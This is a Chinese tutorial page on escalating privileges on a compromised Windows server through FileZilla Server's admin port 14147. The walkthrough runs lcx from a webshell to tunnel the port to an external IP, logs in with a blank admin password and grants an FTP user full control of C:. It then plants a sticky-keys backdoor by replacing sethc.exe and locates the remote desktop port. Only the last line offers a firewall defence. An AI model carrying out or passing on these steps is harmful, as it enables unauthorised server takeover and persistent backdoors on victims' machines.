网络安全

关注公众号 jb51net

关闭
FileZilla Server 利用14147端口提权视频教程

FileZilla Server 利用14147端口提权视频教程

热门排行

简介

这里为大家分享一下FileZilla Server 利用14147端口提权视频教程,这样对于防御就有了个不错的思路,最后对给大家一个预防思路啊。

做个教程投稿,不知道有没有奖励~~

开了有3306,说明有root,不过我试了root账户被降权了,也就没法利用了,

所以利用14147提权,

用lcx端口转发工具,把14147端口转发到我们本机,

shell上运行D:\RECYCLER\lcx.exe -slave 42.239.18.58 327 127.0.0.1 14147

这样把14147转发到我们本机的327端口上,

先本机监听,本机运行lcx -listen 327 3333

是把327转发到3333,

现在在shell运行,

[+] Accept a Client on port 327 from 103.31.75.78 .....
[+] Waiting another Client on port:3333....

OK,然后我们本机下载FileZilla Server这个软件,来连接登录上去,

端口是3333,管理密码一般都是空,

已连接, 等待认证
协议警告: 服务器版本不匹配: 服务器版本为 0.9.51.32, 管理界面版本为 0.9.65.0
协议错误: 协议版本不匹配: 服务器协议版本为 0.1.11.0, 管理界面协议版本为 0.1.13.0

出现这个提示,说明版本不匹配,怎么办呢,他这个版本如果是老版本,网上还难找,

一般软件安装目录,是有权限浏览的,然后就能下载咯,我们在他服务器上下载他的,就和他的版本一样了,

D盘没有,

对路径“C:\”的访问被拒绝。

访问不了C盘根目录,我们直接访问C:\Program Files\

看到没,FileZilla Server,进去,下载里面的文件到本机,是可以下载的,我已经下载过了,

已连接,正在等待验证
已登录

然后点用户,添加一个自己的,密码勾上设置个密码,也可以不设置就是空密码,

然后点共享文件夹,添加一个C盘,右侧的权限都勾上,然后保存,

现在用FTP软件连接,端口一般是21,点编辑,设置这里可以看到端口,

现在C盘完全控制,上shift后门咯,

替换掉下面这两个文件夹的sethc文件,
C:\windows\system32\sethc.exe
C:\windows\system32\dllcache\sethc.exe

我用cmd替换,俩都换好了,现在找远程端口,

查服务tasklist /svc

svchost.exe                   1628 TermService 

TermService  的PID是1628,现在找PID 1628 对应的端口,就是远程端口咯,

查端口netstat -ano

TCP    0.0.0.0:7755           0.0.0.0:0              LISTENING       1628

端口是7755

OK服务器到手。

教程到此结束。

脚本之家小编给出的防御方法:通过端口策略或防火墙,禁止本地的14147连接任意ip的任意端口即可。

大家还下载了